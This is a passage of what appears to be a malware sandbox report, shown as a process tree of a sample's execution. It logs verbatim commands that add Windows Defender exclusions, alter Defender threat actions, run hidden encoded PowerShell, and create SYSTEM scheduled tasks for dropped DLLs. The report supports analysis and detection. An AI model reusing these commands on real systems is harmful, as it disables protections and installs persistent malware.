                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:2836
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:1680
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • Windows security bypass
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2336
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • Windows security bypass
                                                      PID:660
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FFmoqIwyCFUn" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:1684
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FFmoqIwyCFUn" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:672
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KfUtAOroJmGU2" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:2800
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KfUtAOroJmGU2" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1504
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QcGCGayyaPLLC" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:1120
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QcGCGayyaPLLC" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2168
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ipKryXWWU" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2004
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ipKryXWWU" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3008
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJWGOJOeniRHVrLuwjR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2512
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJWGOJOeniRHVrLuwjR" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2584
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\coeVQdnlUzEFEwVB" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\coeVQdnlUzEFEwVB" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2712
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2644
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2820
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:2984
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RwdoDobYYmMYJBBuk" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2548
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:912
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EVEUCunQCfdKYNhg" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2580
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "gZogwYmJq" /SC once /ST 18:30:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        3⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:1644
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "gZogwYmJq"
                                                                        3⤵
                                                                          PID:1276
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gZogwYmJq"
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1860
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2480
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                            4⤵
                                                                              PID:1028
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                            3⤵
                                                                              PID:800
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                4⤵
                                                                                  PID:112
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "oMBiwXvNIGedYCPih" /SC once /ST 02:24:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EVEUCunQCfdKYNhg\pVFhArlXtKjItaV\ZXTmQUI.exe\" r4 /xeYRdidVe 525403 /S" /V1 /F
                                                                                3⤵
                                                                                • Drops file in Windows directory
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:2280
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "oMBiwXvNIGedYCPih"
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1184
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 260
                                                                                3⤵
                                                                                • Loads dropped DLL
                                                                                • Program crash
                                                                                PID:1048
                                                                            • C:\Windows\Temp\EVEUCunQCfdKYNhg\pVFhArlXtKjItaV\ZXTmQUI.exe
                                                                              C:\Windows\Temp\EVEUCunQCfdKYNhg\pVFhArlXtKjItaV\ZXTmQUI.exe r4 /xeYRdidVe 525403 /S
                                                                              2⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Drops Chrome extension
                                                                              • Drops file in System32 directory
                                                                              • Drops file in Program Files directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2940
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                3⤵
                                                                                  PID:1332
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                    4⤵
                                                                                    • Indirect Command Execution
                                                                                    PID:1756
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1092
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                          PID:696
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                      4⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1952
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:1244
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            6⤵
                                                                                              PID:2148
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:1432
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:2376
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                6⤵
                                                                                                  PID:1608
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:572
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:1544
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    6⤵
                                                                                                      PID:3068
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3012
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    5⤵
                                                                                                      PID:1996
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:820
                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          7⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2172
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "bIYlhJRHReAjNrjZjW"
                                                                                                  3⤵
                                                                                                    PID:660
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1556
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                      4⤵
                                                                                                      • Indirect Command Execution
                                                                                                      PID:632
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        5⤵
                                                                                                          PID:1504
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                            6⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2796
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                              7⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2652
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                        4⤵
                                                                                                        • Indirect Command Execution
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2604
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          5⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2696
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                            6⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Drops file in System32 directory
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2564
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                              7⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2912
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ipKryXWWU\kVwuqC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "vSzuFzgVpihrOSe" /V1 /F
                                                                                                      3⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:2856
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "vSzuFzgVpihrOSe2" /F /xml "C:\Program Files (x86)\ipKryXWWU\aTSMSvZ.xml" /RU "SYSTEM"
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:1364
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /END /TN "vSzuFzgVpihrOSe"
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:468
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /DELETE /F /TN "vSzuFzgVpihrOSe"
                                                                                                      3⤵
                                                                                                        PID:624
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "dWUjuSliaXNNuF" /F /xml "C:\Program Files (x86)\KfUtAOroJmGU2\cnwTFUi.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:820
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "FjkVXZyAmalRm2" /F /xml "C:\ProgramData\coeVQdnlUzEFEwVB\rUpmpfD.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1612
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "hHmDJSWgAZMZIaBVm2" /F /xml "C:\Program Files (x86)\sJWGOJOeniRHVrLuwjR\DLZHbRZ.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2756
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "XdbppUsiEuoEaGPxVpx2" /F /xml "C:\Program Files (x86)\QcGCGayyaPLLC\CFRGbkV.xml" /RU "SYSTEM"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1220
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "sEhzEhcCnoyHpZbDA" /SC once /ST 08:48:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EVEUCunQCfdKYNhg\ZcZpiQXO\rFUhVPr.dll\",#1 /TGJdidhx 525403" /V1 /F
                                                                                                        3⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1288
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "sEhzEhcCnoyHpZbDA"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3028
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "oMBiwXvNIGedYCPih"
                                                                                                        3⤵
                                                                                                          PID:2540
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 1544
                                                                                                          3⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Program crash
                                                                                                          PID:2736
                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EVEUCunQCfdKYNhg\ZcZpiQXO\rFUhVPr.dll",#1 /TGJdidhx 525403
                                                                                                        2⤵
                                                                                                          PID:2512
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EVEUCunQCfdKYNhg\ZcZpiQXO\rFUhVPr.dll",#1 /TGJdidhx 525403
                                                                                                            3⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in System32 directory
                                                                                                            • Enumerates system info in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:2056
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "sEhzEhcCnoyHpZbDA"
                                                                                                              4⤵
                                                                                                                PID:2844
                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                          taskeng.exe {49119349-2847-4C2C-ACD0-7739E1E6BB59} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
                                                                                                          1⤵
                                                                                                            PID:380
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1680
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:1296
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                2⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2568
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  3⤵
                                                                                                                    PID:2476
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                  2⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1484
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    3⤵
                                                                                                                      PID:1852
                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                  1⤵
                                                                                                                    PID:2268
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:2696
                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                      1⤵
                                                                                                                        PID:2076

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\KfUtAOroJmGU2\cnwTFUi.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        a9812888fc255b95ccf61a118bdecab6

                                                                                                                        SHA1

